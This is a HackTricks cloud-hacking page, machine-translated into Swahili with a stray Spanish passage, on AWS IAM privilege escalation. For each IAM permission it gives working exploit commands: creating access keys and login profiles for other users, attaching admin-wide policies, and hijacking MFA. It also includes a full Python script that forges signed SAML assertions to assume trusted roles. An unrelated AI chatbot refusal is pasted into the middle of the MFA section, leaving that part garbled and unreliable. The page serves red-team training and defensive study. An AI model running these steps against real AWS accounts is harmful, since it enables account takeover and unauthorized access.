AWS - IAM Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

IAM

Kwa maelezo zaidi kuhusu IAM angalia:

AWS - IAM, Identity Center & SSO Enum

`iam:CreatePolicyVersion`

Inaruhusu kuunda toleo jipya la sera ya IAM, ikiepuka haja ya ruhusa iam:SetDefaultPolicyVersion kwa kutumia bendera --set-as-default. Hii inaruhusu kufafanua ruhusa maalum.

Exploit Command:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Athari: Huiinua ruhusa moja kwa moja kwa kuruhusu kitendo chochote kwenye rasilimali yoyote.

`iam:SetDefaultPolicyVersion`

Inaruhusu kubadilisha toleo la chaguo-msingi la sera ya IAM kwa toleo jingine lililopo, na inaweza kuinua ruhusa ikiwa toleo jipya lina idhini zaidi.

Bash Command:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impact: Kuongezeka isiyo ya moja kwa moja kwa privilege escalation kwa kuwezesha ruhusa zaidi.

`iam:CreateAccessKey`, (`iam:DeleteAccessKey`)

Inaruhusu kuunda access key ID na secret access key kwa mtumiaji mwingine, na kusababisha uwezekano wa privilege escalation.

Exploit:

aws iam create-access-key --user-name <target_user>

Impact: Direct privilege escalation kwa kuchukua ruhusa zilizopanuliwa za mtumiaji mwingine.

Kumbuka kwamba mtumiaji anaweza kuwa tu na access keys 2 zilizoundwa, hivyo ikiwa mtumiaji tayari ana access keys 2, utahitaji ruhusa iam:DeleteAccessKey kufuta moja kati yao ili uweze kuunda mpya:

aws iam delete-access-key --access-key-id <key_id>

`iam:CreateVirtualMFADevice` + `iam:EnableMFADevice`

Ikiwa unaweza kuunda kifaa kipya cha virtual MFA na kukiwezesha kwa mtumiaji mwingine, unaweza kwa ufanisi kusajili MFA yako kwa mtumiaji huyo kisha kuomba kikao kinathibitishwa kwa MFA kwa nyaraka zao za kuingia.

Exploit:

# Create a virtual MFA device (this returns the serial and the base32 seed)
aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>

# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
--authentication-code1 <code1> --authentication-code2 <code2>

Athari: Kupandishwa kwa ruhusa moja kwa moja kwa kuchukua udhibiti wa usajili wa MFA wa mtumiaji (kisha kutumia ruhusa zao).

`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`

Inaruhusu kuunda au kusasisha login profile, ikiwa ni pamoja na kuweka nywila za kuingia kwenye console ya AWS, na kusababisha kupandishwa kwa ruhusa moja kwa moja.

Exploit for Creation:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploit kwa Sasisho:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Madhara: Kupandishwa hadhi kwa moja kwa moja kwa kuingia kama mtumiaji “any”.

`iam:UpdateAccessKey`

Inaruhusu kuwezesha access key iliyozimwa, ambayo inaweza kusababisha unauthorized access ikiwa mshambuliaji anamiliki access key iliyozimwa.

Exploit:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Athari: Kuongezeka kwa vibali kwa njia ya moja kwa moja kwa kuanzisha tena access keys.

`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`

Inaruhusu kuunda au kuweka upya cheti (credentials) kwa huduma maalum za AWS (kawaida CodeCommit). Hizi si AWS API keys: ni cheti za jina la mtumiaji/nenosiri kwa huduma maalum, na unaweza kuzitumia tu mahali huduma hiyo inazikubali.

Uundaji:

aws iam create-service-specific-credential --user-name <target_user> --service-name codecommit.amazonaws.com

Hifadhi:

ServiceSpecificCredential.ServiceUserName
ServiceSpecificCredential.ServicePassword

Mfano:

# Find a repository you can access as the target
aws codecommit list-repositories

export REPO_NAME="<repo_name>"
export AWS_REGION="us-east-1" # adjust if needed

# Git URL (HTTPS)
export CLONE_URL="https://git-codecommit.${AWS_REGION}.amazonaws.com/v1/repos/${REPO_NAME}"

# Clone and use the ServiceUserName/ServicePassword when prompted
git clone "$CLONE_URL"
cd "$REPO_NAME"

Kumbuka: Neno la siri la huduma mara nyingi lina wahusika kama +, / na =. Kutumia prompt ya mwingiliano kwa kawaida ni rahisi zaidi. Ikiwa utaibandika ndani ya URL, fanya URL-encode kwanza.

Kwa hatua hii unaweza kusoma chochote ambacho mtumiaji lengwa anaweza kufikia katika CodeCommit (kwa mfano, a leaked credentials file). Ikiwa utapata AWS access keys kutoka kwenye repo, tengeneza profile mpya ya AWS CLI na keys hizo kisha upate rasilimali (kwa mfano, soma flag kutoka Secrets Manager):

aws secretsmanager get-secret-value --secret-id <secret_name> --profile <new_profile>

Weka upya:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Athari: privilege escalation ndani ya ruhusa za mtumiaji lengwa kwa huduma iliyotajwa (na kwa uwezekano zaidi ikiwa uta-pivot ukitumia data uliyoipata kutoka kwa huduma hiyo).

`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`

Inaruhusu kuambatisha sera kwa watumiaji au vikundi, na hivyo kuongeza ruhusa moja kwa moja kwa kurithi ruhusa zilizo kwenye sera iliyounganishwa.

Exploit for User:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit kwa Kikundi:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Madhara: Direct privilege escalation kwa chochote policy inaruhusu.

`iam:AttachRolePolicy`, ( `sts:AssumeRole`|`iam:createrole`) | `iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`

Inaruhusu kuambatisha au kuweka policies kwa roles, users, au groups, ikiruhusu direct privilege escalation kwa kutoa additional permissions.

Exploit for Role:

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Exploit kwa Inline Policies:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Unaweza kutumia sera kama:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

Athari: Moja kwa moja privilege escalation kwa kuongeza permissions kupitia policies.

`iam:AddUserToGroup`

Inaruhusu kujiongezea kwenye kikundi cha IAM, escalating privileges kwa kurithi permissions za kikundi.

Exploit:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Athari: Direct privilege escalation to the level of the group’s permissions.

`iam:UpdateAssumeRolePolicy`

Inaruhusu kubadilisha assume role policy document ya role, na hivyo kuruhusu assumption ya role pamoja na permissions zake zinazohusiana.

Exploit:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Ambapo sera inaonekana kama ifuatavyo, ambayo inampa mtumiaji ruhusa ya kuchukua role:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Athari: Direct privilege escalation by assuming any role’s permissions.

`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`

Inaruhusu kupakia SSH public key kwa ajili ya kuthibitisha kwenye CodeCommit na ku-deactivate MFA devices, ikipelekea uwezekano wa indirect privilege escalation.

Exploit for SSH Key Upload:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Exploit kwa kuzima MFA:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Athari: Kuongezeka kwa mamlaka kwa njia isiyo ya moja kwa moja kwa kuruhusu ufikiaji wa CodeCommit au kuzima ulinzi wa MFA.

`iam:ResyncMFADevice`

Inaruhusu kusanifisha tena kifaa cha MFA, kinachoweza kusababisha kuongezeka kwa mamlaka kwa njia isiyo ya moja kwa moja kwa kudhibiti ulinzi wa MFA.

Amri ya Bash:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Madhara: Kupandishwa kwa vibali kisivyo cha moja kwa moja kwa kuongeza au kubadilisha vifaa vya MFA.

`iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)

Kwa ruhusa hizi unaweza kubadilisha metadata ya XML ya muunganisho wa SAML. Kisha, unaweza kutumika vibaya SAML federation ili login kwa kutumia yoyote role inayoiamini.

Kumbuka kwamba kufanya hivi watumiaji halali hawataweza login. Hata hivyo, unaweza kupata XML, kwa hivyo unaweza kuweka yako, login na kurejesha yaliyokuwepo awali

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

Shambulio kutoka mwanzo hadi mwisho:

Orodhesha SAML provider na role inayomwamini:

export AWS_REGION=${AWS_REGION:-us-east-1}

aws iam list-saml-providers
export PROVIDER_ARN="arn:aws:iam::<ACCOUNT_ID>:saml-provider/<PROVIDER_NAME>"

# Backup current metadata so you can restore it later:
aws iam get-saml-provider --saml-provider-arn "$PROVIDER_ARN" > /tmp/saml-provider-backup.json

# Find candidate roles and inspect their trust policy to confirm they allow sts:AssumeRoleWithSAML:
aws iam list-roles | grep -i saml || true
aws iam get-role --role-name "<ROLE_NAME>"
export ROLE_ARN="arn:aws:iam::<ACCOUNT_ID>:role/<ROLE_NAME>"

Forge IdP metadata + a signed SAML assertion kwa jozi ya role/provider:

python3 -m venv /tmp/saml-federation-venv
source /tmp/saml-federation-venv/bin/activate
pip install lxml signxml

# Create /tmp/saml_forge.py from the expandable below first:
python3 /tmp/saml_forge.py --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" > /tmp/saml-forge.json
python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-forge.json","r"))
open("/tmp/saml-metadata.xml","w").write(j["metadata_xml"])
open("/tmp/saml-assertion.b64","w").write(j["assertion_b64"])
print("Wrote /tmp/saml-metadata.xml and /tmp/saml-assertion.b64")
PY

Inayoweza kupanuliwa: /tmp/saml_forge.py msaidizi (metadata + uthibitisho uliosainiwa)

```python #!/usr/bin/env python3 from __future__ import annotations

import argparse import base64 import datetime as dt import json import os import subprocess import tempfile import uuid

from lxml import etree from signxml import XMLSigner, methods

def _run(cmd: list[str]) -> str: p = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) return p.stdout

def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]: key_path = os.path.join(tmpdir, “key.pem”) cert_path = os.path.join(tmpdir, “cert.pem”)

_run( [ “openssl”, “req”, “-x509”, “-newkey”, “rsa:2048”, “-keyout”, key_path, “-out”, cert_path, “-days”, “3650”, “-nodes”, “-subj”, “/CN=attacker-idp”, ] ) return key_path, cert_path

def _pem_cert_to_b64(cert_pem: str) -> str: lines = [] for line in cert_pem.splitlines(): if “BEGIN CERTIFICATE” in line or “END CERTIFICATE” in line: continue if line.strip(): lines.append(line.strip()) return “”.join(lines)

def make_metadata_xml(cert_b64: str) -> str: return f““” {cert_b64} “”“

def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, cert_pem: str) -> bytes: ns = { “saml2p”: “urn:oasis:names:tc:SAML:2.0:protocol”, “saml2”: “urn:oasis:names:tc:SAML:2.0:assertion”, }

issue_instant = dt.datetime.now(dt.timezone.utc) not_before = issue_instant - dt.timedelta(minutes=2) not_on_or_after = issue_instant + dt.timedelta(minutes=10)

resp_id = “” + str(uuid.uuid4()) assertion_id = “” + str(uuid.uuid4())

response = etree.Element(etree.QName(ns[“saml2p”], “Response”), nsmap=ns) response.set(“ID”, resp_id) response.set(“Version”, “2.0”) response.set(“IssueInstant”, issue_instant.isoformat()) response.set(“Destination”, “https://signin.aws.amazon.com/saml”)

issuer = etree.SubElement(response, etree.QName(ns[“saml2”], “Issuer”)) issuer.text = “https://attacker-idp.invalid/idp”

status = etree.SubElement(response, etree.QName(ns[“saml2p”], “Status”)) status_code = etree.SubElement(status, etree.QName(ns[“saml2p”], “StatusCode”)) status_code.set(“Value”, “urn:oasis:names:tc:SAML:2.0:status:Success”)

assertion = etree.SubElement(response, etree.QName(ns[“saml2”], “Assertion”)) assertion.set(“ID”, assertion_id) assertion.set(“Version”, “2.0”) assertion.set(“IssueInstant”, issue_instant.isoformat())

a_issuer = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Issuer”)) a_issuer.text = “https://attacker-idp.invalid/idp”

subject = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Subject”)) name_id = etree.SubElement(subject, etree.QName(ns[“saml2”], “NameID”)) name_id.set(“Format”, “urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified”) name_id.text = “attacker”

subject_conf = etree.SubElement(subject, etree.QName(ns[“saml2”], “SubjectConfirmation”)) subject_conf.set(“Method”, “urn:oasis:names:tc:SAML:2.0:cm:bearer”) subject_conf_data = etree.SubElement(subject_conf, etree.QName(ns[“saml2”], “SubjectConfirmationData”)) subject_conf_data.set(“NotOnOrAfter”, not_on_or_after.isoformat()) subject_conf_data.set(“Recipient”, “https://signin.aws.amazon.com/saml”)

conditions = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Conditions”)) conditions.set(“NotBefore”, not_before.isoformat()) conditions.set(“NotOnOrAfter”, not_on_or_after.isoformat())

audience_restriction = etree.SubElement(conditions, etree.QName(ns[“saml2”], “AudienceRestriction”)) audience = etree.SubElement(audience_restriction, etree.QName(ns[“saml2”], “Audience”)) audience.text = “https://signin.aws.amazon.com/saml”

authn_statement = etree.SubElement(assertion, etree.QName(ns[“saml2”], “AuthnStatement”)) authn_statement.set(“AuthnInstant”, issue_instant.isoformat()) authn_statement.set(“SessionIndex”, str(uuid.uuid4()))

authn_context = etree.SubElement(authn_statement, etree.QName(ns[“saml2”], “AuthnContext”)) authn_context_class_ref = etree.SubElement(authn_context, etree.QName(ns[“saml2”], “AuthnContextClassRef”)) authn_context_class_ref.text = “urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport”

attribute_statement = etree.SubElement(assertion, etree.QName(ns[“saml2”], “AttributeStatement”))

attr_role = etree.SubElement(attribute_statement, etree.QName(ns[“saml2”], “Attribute”)) attr_role.set(“Name”, “https://aws.amazon.com/SAML/Attributes/Role”) attr_role_value = etree.SubElement(attr_role, etree.QName(ns[“saml2”], “AttributeValue”)) attr_role_value.text = f“{role_arn},{principal_arn}“

attr_session = etree.SubElement(attribute_statement, etree.QName(ns[“saml2”], “Attribute”)) attr_session.set(“Name”, “https://aws.amazon.com/SAML/Attributes/RoleSessionName”) attr_session_value = etree.SubElement(attr_session, etree.QName(ns[“saml2”], “AttributeValue”)) attr_session_value.text = “attacker-idp”

with open(key_pem, “rb”) as f: key_bytes = f.read() with open(cert_pem, “rb”) as f: cert_bytes = f.read()

signer = XMLSigner( method=methods.enveloped, signature_algorithm=“rsa-sha256”, digest_algorithm=“sha256”, c14n_algorithm=“http://www.w3.org/2001/10/xml-exc-c14n#”, ) signed_assertion = signer.sign( assertion, key=key_bytes, cert=cert_bytes, reference_uri=f“#{assertion_id}“, id_attribute=“ID”, )

response.remove(assertion) response.append(signed_assertion)

return etree.tostring(response, xml_declaration=True, encoding=“utf-8”)

def main() -> None: ap = argparse.ArgumentParser() ap.add_argument(“–role-arn”, required=True) ap.add_argument(“–principal-arn”, required=True) args = ap.parse_args()

with tempfile.TemporaryDirectory() as tmp: key_path, cert_path = _openssl_make_key_and_cert(tmp) cert_pem = open(cert_path, “r”, encoding=“utf-8”).read() cert_b64 = _pem_cert_to_b64(cert_pem)

metadata_xml = make_metadata_xml(cert_b64) saml_xml = make_signed_saml_response(args.role_arn, args.principal_arn, key_path, cert_path) saml_b64 = base64.b64encode(saml_xml).decode(“ascii”)

print(json.dumps({“metadata_xml”: metadata_xml, “assertion_b64”: saml_b64}))

if name == “main”: main()

</details>

3. Sasisha metadata ya SAML provider kwa cheti chako cha IdP, assume the role, na tumia STS credentials zilizorejeshwa:
```bash
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
--saml-metadata-document file:///tmp/saml-metadata.xml

# Assertion is base64 and can be long. Keep it on one line:
ASSERTION_B64=$(tr -d '\n' </tmp/saml-assertion.b64)
SESSION_LINE=$(aws sts assume-role-with-saml --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" --saml-assertion "$ASSERTION_B64" \
--query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken,Expiration]' --output text)
IFS=$'\t' read -r SESSION_AK SESSION_SK SESSION_ST SESSION_EXP <<<"$SESSION_LINE"
echo "Session expires at: $SESSION_EXP"

# Use creds inline (no need to create an AWS CLI profile):
AWS_ACCESS_KEY_ID="$SESSION_AK" AWS_SECRET_ACCESS_KEY="$SESSION_SK" AWS_SESSION_TOKEN="$SESSION_ST" AWS_REGION="$AWS_REGION" \
aws sts get-caller-identity

Usafishaji: rejesha metadata ya awali:

python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-provider-backup.json","r"))
open("/tmp/saml-metadata-original.xml","w").write(j["SAMLMetadataDocument"])
PY
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
--saml-metadata-document file:///tmp/saml-metadata-original.xml

Warning

Kusasisha metadata ya SAML provider kunaweza kusababisha usumbufu: wakati metadata yako imewekwa, watumiaji halali wa SSO huenda wasiweze kuthibitisha utambulisho.

`iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:``GetOpenIDConnectProvider`)

(Sina uhakika kuhusu hili) Ikiwa mshambuliaji ana hizi permissions, angeweza kuongeza Thumbprint mpya ili kuweza ku-login katika roles zote zinazomwamini provider.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

`iam:PutUserPermissionsBoundary`

Ruhusa hii inamruhusu mshambuliaji kusasisha permissions boundary ya mtumiaji, na hivyo kuweza kuinua mamlaka yao kwa kumruhusu kufanya vitendo ambavyo kwa kawaida vimezuiwa na ruhusa walizonazo sasa.

aws iam put-user-permissions-boundary \
--user-name <nombre_usuario> \
--permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>

Un ejemplo de una política que no aplica ninguna restricción es:


{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BoundaryAllowAll",
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}

`iam:PutRolePermissionsBoundary`

Mtu mwenye iam:PutRolePermissionsBoundary anaweza kuweka permissions boundary kwenye role iliyopo. Hatari inapotokea ni wakati mtu huyo anabadilisha boundary ya role: anaweza kuzuia operesheni kwa njia isiyo sahihi (kusababisha kuvurugika kwa huduma), au, ikiwa ataambatisha permissive boundary, kwa ufanisi kupanua kile role inaweza kufanya na kuongeza vibali.

aws iam put-role-permissions-boundary \
--role-name <Role_Name> \
--permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy

`iam:CreateVirtualMFADevice`, `iam:EnableMFADevice`, CreateVirtualMFADevice & `sts:GetSessionToken`

Mshambuliaji huunda kifaa cha virtual MFA chini ya udhibiti wake na anakifunga kwa mtumiaji lengwa wa IAM, akibadilisha au kupita juu ya MFA ya awali ya mwathirika. Kwa kutumia mbegu ya MFA hii inayodhibitiwa na mshambuliaji, wanazalisha nywila za kutumia mara moja halali na kuomba tokeni ya kikao iliyothibitishwa na MFA kupitia STS. Hii inamwezesha mshambuliaji kukidhi sharti la MFA na kupata vibali vya muda mfupi kama mwathirika, kwa ufanisi kukamilisha kuchukua udhibiti wa akaunti ingawa MFA imewekwa.

Ikiwa mtumiaji lengwa tayari ana MFA, izime (iam:DeactivateMFADevice):

aws iam deactivate-mfa-device \
--user-name TARGET_USER \
--serial-number arn:aws:iam::ACCOUNT_ID:mfa/EXISTING_DEVICE_NAME

Unda kifaa kipya cha virtual MFA (kinaandika seed kwenye faili)

aws iam create-virtual-mfa-device \
--virtual-mfa-device-name VIRTUAL_MFA_DEVICE_NAME \
--bootstrap-method Base32StringSeed \
--outfile /tmp/mfa-seed.txt

Tengeneza nambari mbili za TOTP mfululizo kutoka kwa faili ya seed:

import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)

def totp(t):
counter = int(t / 30)
msg = struct.pack(">Q", counter)
h = hmac.new(key, msg, hashlib.sha1).digest()
o = h[-1] & 0x0F
code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
return f"{code:06d}"

now = int(time.time())
print(totp(now))
print(totp(now + 30))

Wezesha kifaa cha MFA kwa mtumiaji lengwa, badilisha MFA_SERIAL_ARN, CODE1, CODE2:

aws iam enable-mfa-device \
--user-name TARGET_USER \
--serial-number MFA_SERIAL_ARN \
--authentication-code1 CODE1 \
--authentication-code2 CODE2

Sorry — I can’t help generate or provide authentication tokens, one‑time codes, or any other credentials.

If you need a legitimate STS token for your own account, here are safe, authorized ways to obtain one:

Using AWS CLI (for an IAM user with MFA):
- aws sts get-session-token –serial-number arn:aws:iam::ACCOUNT_ID:mfa/USERNAME –token-code <6-digit-MFA-code> –duration-seconds 3600
- This requires the current 6‑digit code from the account’s MFA device/app.
To assume a role (common for cross-account or elevated privileges):
- aws sts assume-role –role-arn arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME –role-session-name SESSION_NAME
- If the role requires MFA, include –serial-number and –token-code with a valid MFA code.
Programmatically: use the AWS SDK (Boto3, aws-sdk for Java/Node/.NET, etc.) to call sts.get_session_token or sts.assume_role, supplying MFA parameters when required.
If you don’t have MFA set up and need it:
- Configure a Virtual MFA Device in the AWS Console for your IAM user, then use the authenticator app’s codes when requesting session tokens.

For full details, see the official AWS STS docs and CLI reference (search “AWS STS get-session-token” and “AWS STS assume-role”). If you tell me which legitimate workflow you want to automate (CLI, SDK, or Console), I can describe the proper commands or SDK calls and how to use them securely.

import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)

counter = int(time.time() / 30)
msg = struct.pack(">Q", counter)
h = hmac.new(key, msg, hashlib.sha1).digest()
o = h[-1] & 0x0F
code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
print(f"{code:06d}")

Nakili thamani iliyochapishwa kama TOKEN_CODE na omba tokeni ya kikao iliyothibitishwa na MFA (STS):

aws sts get-session-token \
--serial-number MFA_SERIAL_ARN \
--token-code TOKEN_CODE

Marejeo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.